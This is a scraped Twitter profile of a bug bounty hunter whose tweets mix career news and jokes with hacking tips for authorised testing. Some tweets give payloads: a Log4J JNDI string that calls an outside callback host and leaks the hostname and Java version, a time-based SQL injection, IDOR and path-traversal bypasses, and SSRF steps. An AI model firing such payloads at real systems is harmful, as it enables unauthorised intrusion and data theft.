Patrik Fehrenbach

@ITSecurityguard

29,880
Followers
285
Following
1,100
Media
4,610
Statuses

rɪsˈpɒnsəbl dɪsˈkləʊʒə

Freiburg
Joined January 2013
Pinned Tweet
@ITSecurityguard
Patrik Fehrenbach
11 months
Just launched a community discord for Practical Bug Bounty 👇 and a website: and a Repository with content: (not in sync) For anyone who wants to contribute to code, ideas, or content feel free to join ♥️
Tweet media one
5
38
183
@ITSecurityguard
Patrik Fehrenbach
2 years
This is your yearly reminder that ALL Udemy Bug Bounty courses are a waste of money. The content you need is out there, completely for free. Don't believe me? Here is a list of the best Bug Bounty Resources out there 🧵👇 #bugbountytips #BugBounty
105
540
2K
@ITSecurityguard
Patrik Fehrenbach
2 years
@samwcyo @Google Hello, this is Patrik from the Google. I sent u the wire information in DM, please return ASAP.
21
6
1K
@ITSecurityguard
Patrik Fehrenbach
4 years
I compiled a mind-map of all the tools I use for my day to day Bug Bounty journey :) Please let me know if you find this helpful 👐 🥰🔐 full resolution of the image here:
Tweet media one
22
385
1K
@ITSecurityguard
Patrik Fehrenbach
1 year
SQLI on Google (: Flow: I found an old subdomain. I discovered the parameter "q" and injected the classic payload '. After obtaining the injected result, I initiated the exploitation. #bugbounty #bugbountytips
Tweet media one
80
118
1K
@ITSecurityguard
Patrik Fehrenbach
4 years
🥳 New Blogpost! 🥳 How I made more than $30K with Jolokia CVEs Big Thanks to @yaworsk @damian_89_ @un4gii @jstnkndy
Tweet media one
15
350
966
@ITSecurityguard
Patrik Fehrenbach
3 years
Here are some ideas for potential attack surfaces for Log4J:
in your robots.txt 😏
in your dns records (txt...)
in your email headers
in your usernames
in your passwords
in your headers
in your e-mail addresses
in your files
in your SSL Certificates
in your EXIF
#log4j
14
222
890
@ITSecurityguard
Patrik Fehrenbach
5 years
Since absolutely nobody asked for it: I am creating a Youtube channel for tutorials on Android/iOS/ and Bug Bounties in general! (may need to change the intro though) sorry @LiveOverflow @NahamSec If you have any topics I should cover, let me know :)
21
137
800
@ITSecurityguard
Patrik Fehrenbach
4 years
I just uploaded some of the most common file types for my Patrik's Bug Bounty Tools mind map here: SVG: PDF: XMIND: PNG: enjoy! 🥰🥳👑 #bugbountytips #BugBounty
Tweet media one
10
287
756
@ITSecurityguard
Patrik Fehrenbach
5 years
dear Bug Bounty world: DON'T spend money on ANY paid courses/mentors you'll find online, the information shared there is already public. Learn how to use Google and most importantly learn how to apply your knowledge. THERE ARE NO SECRETS FOR SALE 👈 #bugbounty #bugbountytip
31
143
743
@ITSecurityguard
Patrik Fehrenbach
6 years
I recently scored a 4000$ bounty by using visual recon :-) here's a guide on how to do it: Visual Recon – A beginners guide: … enjoy!
11
271
700
@ITSecurityguard
Patrik Fehrenbach
3 years
Want to make easy money online?
1. Copy + Paste
2. Make Udemy Course
3. $$$
Tweet media one
34
82
685
@ITSecurityguard
Patrik Fehrenbach
3 years
#bugbountytip #bugbounty #pii #critical #bugbountytips
GET /api/users/1 (where I'm user 1) -> HTTP 200
GET /api/users/;/2 -> HTTP 100
GET /api/users/;;/2 -> HTTP 200
GET /api/users/;;;/2 -> HTTP 300
GET /api/users/;;;;/2 -> HTTP 400
GET /api/users/;;;;;/2 -> HTTP 500
27
199
680
@ITSecurityguard
Patrik Fehrenbach
3 years
trying to test every header of a website for #log4j ? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: ${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io} now you know the vuln header :) #bugbounty #bugbountytips
Tweet media one
Tweet media two
Tweet media three
10
211
662
@ITSecurityguard
Patrik Fehrenbach
2 years
Play games, do CTFs, code, go outside and enjoy the weather, listen to music, cook, read, ANYTHING But please don't hack billion dollar companies for absolutely nothing. #nomorefreebugs #bugbountytip #bugbountytips (1)
Tweet media one
25
110
630
@ITSecurityguard
Patrik Fehrenbach
4 years
18
141
622
@ITSecurityguard
Patrik Fehrenbach
4 years
Bug Bounty these days: recon |xargs| grep -ax( “$sub.example.com) &> /dev/null > outtmp1.txt | httprobe -c 10000000000000 > gau | screenshots -/outdir1/as> xssscnner300 < "vulntest.txt" | nuclei -T $TARGET | masscan --rate 9999999999 | sort -uqa >/tmp/ > all_final_final.html
22
162
579
@ITSecurityguard
Patrik Fehrenbach
2 years
I found an API that would take an ID parameter as input to show the User details, so obviously I have tried to change it to a different ID - didn't work. What did work though: id=-1 17MB JSON response, someone will have a fun week ahead. #BugBounty #bugbountytips
Tweet media one
14
78
567
@ITSecurityguard
Patrik Fehrenbach
5 years
Sentry Blind SSRF ( /)
1. cat aquatone/*/urls.txt | grep sentry
2. Burpsuite
3. Send it to Repeater
4. Change the value of filename: to a url (or similar)
5. Wait for a connection
6. 👻
Tweet media one
10
236
535
@ITSecurityguard
Patrik Fehrenbach
11 months
After the whole paid courses drama yesterday I started to code a bit and came up with an idea: A free (😯) website with curated content from the bug bounty community for the bug bounty community. Course Style, beginner friendly, all in one place :) TBM (The BB Mentor) 👇
18
69
473
@ITSecurityguard
Patrik Fehrenbach
3 years
Some personal news: I'll be joining @Shopify @ShopifyEng as a Security Engineer starting January 2022 :-)
Tweet media one
60
3
464
@ITSecurityguard
Patrik Fehrenbach
1 year
I just found an unbelievable number of unauthorized API endpoints using this 1 liner. katana -u $url -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn |subjs | python3 /opt/JSA/jsa.py |goverview probe -N -c 500 |sort -u -t';' -k2,14 |cut -d ';' -f1
24
110
450
@ITSecurityguard
Patrik Fehrenbach
3 years
Built a Raspberry Pi K3S Cluster Today! 🥰 (Club Mate bottle for scale)
Tweet media one
18
21
450
@ITSecurityguard
Patrik Fehrenbach
5 years
Google Template Injection: Status: Unfixed
Tweet media one
33
68
422
@ITSecurityguard
Patrik Fehrenbach
3 years
My highest paid bugs were the easiest ones to find 🤷‍♂️ Remember: Good bugs don't need to contain a complex exploit chain, sometimes a simple misconfiguration is enough :-) impact =! complexity
5
27
410
@ITSecurityguard
Patrik Fehrenbach
3 years
Today I took probably the hardest decision of my life so far. After almost 7 years I have resigned from my position at @Hacker0x01 🥺 Thanks to everyone who was part of the journey, it was an amazing time. I will remain in the Bug Bounty Space 😏 To new challenges! 🍾
57
2
411
@ITSecurityguard
Patrik Fehrenbach
4 years
I am using the following Data sources in Amass: wonderful guide by @hahwul how to set up the API keys:
Tweet media one
5
139
405
@ITSecurityguard
Patrik Fehrenbach
3 years
Holy! @andirrahmani1 and myself just scored a 45.000$ 😱😱😱😱😱 Bounty on @Hacker0x01 That's a new personal record 🎉🎉🎉 Teamwork makes the dream work! #togetherwehitharder
29
9
395
@ITSecurityguard
Patrik Fehrenbach
4 years
There are exactly 2 people who should know how much you made in bounties in 2020: 1.) Yourself 2.) The Tax Office
13
19
363
@ITSecurityguard
Patrik Fehrenbach
2 years
Are you looking for a challenge and want to earn some life-changing money? We've just increased our rewards for high and critical submissions to $50,000 for high and $100,000 for critical issues 😏 let the games begin 🦾 💰
11
48
358
@ITSecurityguard
Patrik Fehrenbach
3 years
Fantastic work by @rootxharsh & @iamnoooob RCE on Apple using a 0day in Lucee for a 50k$ Bounty!
3
109
357
@ITSecurityguard
Patrik Fehrenbach
3 years
The moment you stop the Udemy Videos and open Burpsuite, is when you start making money. 🙃 #bugbountytips #BugBounty
11
26
344
@ITSecurityguard
Patrik Fehrenbach
4 years
The rewards in Bug Bounties shouldn't be your primary motivation to hunt... do it for the knowledge, the fun, the adrenaline. The money will come one day :) (promise)
18
43
335
@ITSecurityguard
Patrik Fehrenbach
4 years
mood.jpg
Tweet media one
17
33
333
@ITSecurityguard
Patrik Fehrenbach
2 years
5
63
319
@ITSecurityguard
Patrik Fehrenbach
10 months
Just released an extension for Burpsuite that allows you to quickly extract the links to Javascript files of a website from the Burpsuite Site map: #BugBounty #Pentesting #bugbountytip #bugbountytips demo 👇
6
69
328
@ITSecurityguard
Patrik Fehrenbach
7 years
Dear upcoming mobile hackers, I wrote a blogpost about bypassing Android Certificate Pinning with Frida: enjoy :-)
11
170
320
@ITSecurityguard
Patrik Fehrenbach
1 year
I asked ChatGPT to write a HackerOne Report like the hacking gods from the 90's would, was not disappointed.
Tweet media one
9
37
318
@ITSecurityguard
Patrik Fehrenbach
5 years
If you start your Bug Bounty journey with excuses, it won't work.
- every bug bounty program has issues to find, public or private
- Burp is amazing, Pro or Community
- Bazillion Tutorials are out there, read them
Success is the result of hard work, you won't get it for free
4
70
311
@ITSecurityguard
Patrik Fehrenbach
4 years
Yay, I was awarded a $5,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder Thank you so much @umr4n6 for the amazing bypass :] /..;/..;/ can only recommend following her :) Vogel #dreamworkmakestheteamwork
6
48
303
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
5
23
296
@ITSecurityguard
Patrik Fehrenbach
3 years
If you are intercepting a locally installed application with Burpsuite and it doesn't pick up the traffic: In Firefox go to about:config and change network.proxy.allow_hijacking_localhost to true 🤗🐧 #BugBounty #bugbountytip #bugbountytips
11
84
290
@ITSecurityguard
Patrik Fehrenbach
3 years
If you struggle with setting up RogueJNDI to exploit the recent log4j vulnerability: I have written a tutorial as part of () Good Luck! 🍀
Tweet media one
4
78
290
@ITSecurityguard
Patrik Fehrenbach
4 years
For those who are wondering if you make money by creating educational content for free: My website - with 378940 unique visitors generated 40,82€ in ad revenue within the last ~5 years. Beers on me! ;-)
14
18
291
@ITSecurityguard
Patrik Fehrenbach
3 years
Bug Bounty is cool and all, but when was the last time you went hiking?
Tweet media one
24
4
277
@ITSecurityguard
Patrik Fehrenbach
4 years
Hey #h12010 , I am not allowed to participate, but I'd do the Recon with Amass: amass enum -d -dir -ip -config /root/config.ini The config file (without creds) So far: 12197 IPs, 11775 Domains 🥰
5
66
277
@ITSecurityguard
Patrik Fehrenbach
4 years
Don't drop out of college because of infosec/bug bounty #bugbountytips #bugbounty #ittakesadegree #togetherwestudyharder
19
30
273
@ITSecurityguard
Patrik Fehrenbach
2 years
I AM THE #1 USA HACKER
Tweet media one
17
15
273
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
14
17
262
@ITSecurityguard
Patrik Fehrenbach
3 years
If you remember this, you had a good youth ❣️
Tweet media one
13
42
260
@ITSecurityguard
Patrik Fehrenbach
3 years
Slides for my "Amassive Leap in Host Discovery" at this year's #NahamCon2021 the Github Repo: 👁️
8
82
262
@ITSecurityguard
Patrik Fehrenbach
5 years
Work from home ❤️
Tweet media one
8
8
263
@ITSecurityguard
Patrik Fehrenbach
4 years
1 Million Reports submitted to @Hacker0x01 🤗 what an amazing milestone :). My very first Report was #20148 (N/A) to Verizon Media on July 15, 2014 - what's yours? #togetherwehitharder
49
11
256
@ITSecurityguard
Patrik Fehrenbach
4 years
My blog was down for a couple of days, some idiot bruteforced /wp-login.php with over 120.000 requests. Bro, if you want an account for my blog - just ask
Tweet media one
23
8
258
@ITSecurityguard
Patrik Fehrenbach
4 years
I don’t hack boxes, I do real hacking. It’s called VIM.
10
7
256
@ITSecurityguard
Patrik Fehrenbach
4 years
i am dying
8
54
258
@ITSecurityguard
Patrik Fehrenbach
3 years
Starting today you can choose which Triage Analyst you want on your Report on @Hacker0x01 !
Tweet media one
27
10
249
@ITSecurityguard
Patrik Fehrenbach
3 years
Test
10
18
246
@ITSecurityguard
Patrik Fehrenbach
4 years
Tweet media one
5
32
248
@ITSecurityguard
Patrik Fehrenbach
3 years
I am a Security Expert so I hereby recommend input validation of every form. 💯
9
13
242
@ITSecurityguard
Patrik Fehrenbach
4 years
Automatic discovery + exfiltration of /.git/ repositories four very easy P1s delivered right in your Slack :) curl -X POST -H 'Content-type: application/json' --data '{"text":"Hello, World!"}' YOUR_WEBHOOK_URL 👩‍🌾❤️
Tweet media one
3
77
245
@ITSecurityguard
Patrik Fehrenbach
3 years
We are hiring U.S. 🇺🇸 Security Analysts for the Triage Team at @Hacker0x01 ! 100% remote DM me if you have any questions Submit your Application on the link below 👇 #infosec #bugbountytips #infosecjobs RT would be appreciated ♻️❤️
Tweet media one
5
105
242
@ITSecurityguard
Patrik Fehrenbach
3 years
best wordlist for content discovery out there?
28
31
238
@ITSecurityguard
Patrik Fehrenbach
3 years
Just crossed 1000 Vulnerability Reports in ~9 Years of Bug Hunting 🤭
Around ~87% were valid, non-duplicates
8 % Dupe
5 % Informative / Not Applicable
Highest Reward = 50.000 USD
Lowest Reward = 25€
98% of the Programs were Bug Bounties, 2% VDPs
#bugbounty
Tweet media one
Tweet media two
25
2
237
@ITSecurityguard
Patrik Fehrenbach
3 years
I found two more!!! #XSs #payloads
1. stop:alert()
2. posting:alert()
3. nonesense:alert()
4. bugbountytips:alert()
5. please:alert()
6. thank:alert()
7. you:alert()
8. bro:alert()
#bugbountytips
21
51
233
@ITSecurityguard
Patrik Fehrenbach
8 months
Steps to gain your first CRITICAL CVE:
1. Do your absolute worst in PHP and upload it to
2. Look for mysqli_query
3. Request CVE
4. Profit. 🤡
#pentesting #BugBounty #infosecurity
Tweet media one
8
35
238
@ITSecurityguard
Patrik Fehrenbach
4 years
Enumeration of 789 root domains (passive + active discovery) using @owaspamass - this tool is a beast! took 10 minutes :)
Tweet media one
13
40
231
@ITSecurityguard
Patrik Fehrenbach
5 years
For BugBounty purposes: Jira SSRF via REST API (CVE-2019-8451) cat aquatone/*/* | grep jira curl grep evil 🦹‍♀️🧙‍♀️ If you are making $$$ out of this information, always remember whom you have to thank for that -> @chybeta 🙏
@chybeta
chybeta
5 years
CVE-2019-8451 Unauthorized SSRF via REST API /plugins/servlet/gadgets/makeRequest use @ to bypass the whitelisting ! 👇 reading resources @orange_8361
1
339
647
3
82
225
@ITSecurityguard
Patrik Fehrenbach
2 years
🧨 of the week (CW 12 / 2022) Remote Command Execution due to publicly accessible Jenkins Bounty: $3000 #bugbountytip #bugbountytipps
Tweet media one
4
23
231
@ITSecurityguard
Patrik Fehrenbach
2 years
I admire everyone that is able to do Bug Bounty full time. I try to find 1-2 critical bugs a week but it is insanely hard to maintain. 👊 mad respect for that
11
9
225
@ITSecurityguard
Patrik Fehrenbach
2 years
🧨💥 of the week (CW 13 / 2022) Exposed SQL Backup file ( 🇩🇪 for database 😉) Bounty: $5000 SQL Injection blind time based (' waitfor delay'0:0:20'--) Bounty $1500 TIL: Adjust your scanning for the country/language your target is using. #BugBounty
5
37
226
@ITSecurityguard
Patrik Fehrenbach
13 days
I am incredibly happy to have skipped Defcon and Blackhat to marry the love of my life ❤️ Thanks to @smiegles @lucio_89 and Melvin for travelling all the way to Germany to spend the day with us ❤️
50
0
230
@ITSecurityguard
Patrik Fehrenbach
3 years
*gets invited to a program with a shared environment* *clicks on registration* *20 XSS pop ups* *closes window* *leaves program* #BugBounty
6
10
217
@ITSecurityguard
Patrik Fehrenbach
2 years
Do you want to create a wordlist for yourself? Not sure where to start? Not sure what others are doing? Go to any public program and find a /metrics endpoint accessible, extract the paths, profit #BugBounty #bugbountytip #bugbountytips
Tweet media one
10
48
219
@ITSecurityguard
Patrik Fehrenbach
4 years
I had hundreds of DMs because of my 10k Tweet again. All I can really tell you is to throw away all of your automation, tooling, recon scripts and get hands on (!) the target. Admittedly not as convenient as waiting for results, but way more rewarding and entertaining. 🙏
7
10
216
@ITSecurityguard
Patrik Fehrenbach
4 years
Happy to announce that I will be presenting at #NahamCon2021 For all you recon hungry people - "Amassive leap in host discovery" :) stay tuned!
Tweet media one
3
16
211
@ITSecurityguard
Patrik Fehrenbach
7 months
Self-hosted Bug Bounty Box:
- XSSHunter by @rs_loves_bugs
- Portainer
- Adguard
- Nextcloud
- Nginx
- Docker Registry
- Unifi Controller
- 3x MariaDB
- 3x Wordpress blogs
- 5x Mail Boxes with poste
- PostgreSQL
- Gitlab CE
- Home Assistant
- Home Bridge
Tweet media one
11
10
216
@ITSecurityguard
Patrik Fehrenbach
3 years
Bug bounties are CTFs on easy mode #SorryNotSorry
12
16
212
@ITSecurityguard
Patrik Fehrenbach
3 years
Yay, I was awarded a $12,100 bounty on @Hacker0x01 !
1 Minor Auth Bypass (1,5k)
2 Misconfigurations (2x5k)
3 Reflected XSS (3x200)
🍀 #TogetherWeHitHarder
9
3
207
@ITSecurityguard
Patrik Fehrenbach
4 years
Yay, I was awarded a $10,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder Usually I don’t yay but this time, I had to Merry Christmas 🎁🎄
9
3
204
@ITSecurityguard
Patrik Fehrenbach
11 months
Just pushed a couple of features to #practicalbugbounty
1. Resources with ~300 tools + 170 Articles
2. Challenges with some free and paid CTF Platforms
3. Night Mode
4. Topic search
... Lots of content still missing but we're getting there :)
Tweet media one
5
54
204
@ITSecurityguard
Patrik Fehrenbach
6 years
LinkedIn: Linux Kernel maintainer
Tweet media one
3
31
208
@ITSecurityguard
Patrik Fehrenbach
3 years
When I turned 30 earlier this year, I made a list of things that I want to achieve in my 30's one of them was buying my own place. And today I finally did it! :-) Thank you @Hacker0x01 @Bugcrowd @zerocopter @intigriti for allowing me to make this happen ❤️
Tweet media one
27
3
205
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
1
34
205
@ITSecurityguard
Patrik Fehrenbach
4 years
If you are looking for ransom, I can tell you I don't have money. But what I do have are a very particular set of skills; skills I have acquired over a very long career. Skills that make me a nightmare for people like you. If you let my xmlrpc.php go, that'll be the end of it.
Tweet media one
15
13
196
@ITSecurityguard
Patrik Fehrenbach
7 years
This is one of the best Jailbreaking (published) research I've seen so far by @coalfirelabs
Tweet media one
1
96
190
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
5
28
195
@ITSecurityguard
Patrik Fehrenbach
8 years
Decoding a $😱,000.00 htpasswd bounty :-) new Blogpost!
12
84
196
@ITSecurityguard
Patrik Fehrenbach
4 years
Writing a new blogpost: "How I made more than 1 Million USD $$$ by asking Bug Bounty people on Twitter for Secrets and Payloads" stay tuned!
9
18
193
@ITSecurityguard
Patrik Fehrenbach
4 years
I just uploaded some scripts I am using to extend Amass: just specify the directory in your amass config: scripts_directory =/root/tools/scripts/ if you have any tool to add just let me know :) #SharingIsCaring #bugbountytips #bugbountytip
1
75
189
@ITSecurityguard
Patrik Fehrenbach
2 months
My 3-step guide for successful bug bounty hunting: 1️⃣ Write an ASM (Attack Surface Management) tool 🛠️ 2️⃣ Run it 🏃‍♂️💨 3️⃣ Report everything! 📝✅ follow me for more tips
Tweet media one
Tweet media two
Tweet media three
10
6
192
@ITSecurityguard
Patrik Fehrenbach
7 years
I am very proud to announce that I'll be joining @Hacker0x01 as a full time employee starting 1.1.2018. tl;dr patrik + hackerone = 🖖 this account will stay a personal one, and there will be new blogposts soon :-) Happy Holidays <3 #togetherwehitharder #bugbountygoals
Tweet media one
34
3
188
@ITSecurityguard
Patrik Fehrenbach
6 years
Hunters, If you want to see which of your subdomains has a webserver running, simply use the amazing httprobe by @TomNomNom cat subdomains.txt | httprobe
0
75
184
@ITSecurityguard
Patrik Fehrenbach
4 years
Yay, I was awarded 140 trays of Red Bull (3360 cans) in USD Currency on @Hacker0x01 ! #TogetherWeHitHarder
10
9
185
@ITSecurityguard
Patrik Fehrenbach
7 years
Wrote a beautiful thing with help from the awesome @_takeshix It will find AWS S3 Buckets in no time :-) will release it soon.
Tweet media one
10
76
181
@ITSecurityguard
Patrik Fehrenbach
4 years
100,000,000 Paid out in Bounties @Hacker0x01 couldn't be more proud being part of that wonderful team 🥰
Tweet media one
0
6
178
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
15
22
180
@ITSecurityguard
Patrik Fehrenbach
5 years
I joined @Hacker0x01 almost 2 years ago as a full time employee and I regret nothing 🥰 incredible company & best team I could wish for 🧡
Tweet media one
6
6
181